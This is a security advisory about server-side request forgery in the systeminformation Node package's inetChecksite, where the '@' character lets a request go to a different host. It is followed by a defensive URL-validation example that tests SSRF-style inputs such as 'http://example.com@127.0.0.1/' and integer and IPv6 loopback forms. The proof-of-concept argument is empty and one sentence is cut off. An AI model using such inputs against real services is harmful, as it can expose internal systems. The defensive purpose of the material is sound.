Server-Side Request Forgery (SSRF) in sebhildebrandt/systeminformation


Reported on Feb 18th 2021


The systeminformation package is vulnerable to server-side request forgery (SSRF). It allows attackers to abuse the @ character to make requests to a different domain, or possibly to applications that are not publicly exposed through

Proof of Concept

const si = require('systeminformation');
si.inetChecksite("").then(a => { console.log(a) });
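
A pre-flight check an application can run on user-supplied URLs before handing them to inetChecksite, showing that a standards-based parser treats everything before @ as userinfo rather than as the host. This is an added example, not code from the report or from the systeminformation project; checkSiteUrl and ALLOWED_HOSTS are hypothetical names and the listed hosts are placeholders.

```javascript
// Added example (not from the report or the systeminformation project).
// ALLOWED_HOSTS and checkSiteUrl are hypothetical names; hosts are placeholders.
const ALLOWED_HOSTS = new Set(['example.com', 'status.example.com']);

// Validate a user-supplied URL before it reaches si.inetChecksite().
function checkSiteUrl(input) {
  let u;
  try {
    u = new URL(String(input));
  } catch (e) {
    return { ok: false, reason: 'unparseable' };
  }
  if (u.protocol !== 'http:' && u.protocol !== 'https:') {
    return { ok: false, reason: 'scheme' };
  }
  // Everything before "@" is userinfo, not the host: reject it outright.
  if (u.username !== '' || u.password !== '') {
    return { ok: false, reason: 'userinfo' };
  }
  // The WHATWG parser normalises integer/hex IPv4 forms to dotted decimal
  // and keeps IPv6 literals in brackets, so both are easy to spot here.
  const host = u.hostname;
  if (/^\d+\.\d+\.\d+\.\d+$/.test(host) || host.startsWith('[')) {
    return { ok: false, reason: 'ip-literal' };
  }
  if (!ALLOWED_HOSTS.has(host)) {
    return { ok: false, reason: 'host-not-allowed' };
  }
  // Return the normalised form so the URL that was checked is the one requested.
  return { ok: true, url: u.href };
}

// Constructed sample inputs.
const samples = [
  'https://example.com/health',
  'http://example.com@127.0.0.1/',
  'http://2130706433/',
  'http://[::1]/',
  'http://internal.corp.example/',
  'ftp://example.com/',
];
for (const s of samples) {
  console.log(s, '->', JSON.stringify(checkSiteUrl(s)));
}
```

A host allowlist does not cover redirects or a permitted name that resolves to an internal address, so outbound requests from the service should also be restricted at the network layer.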
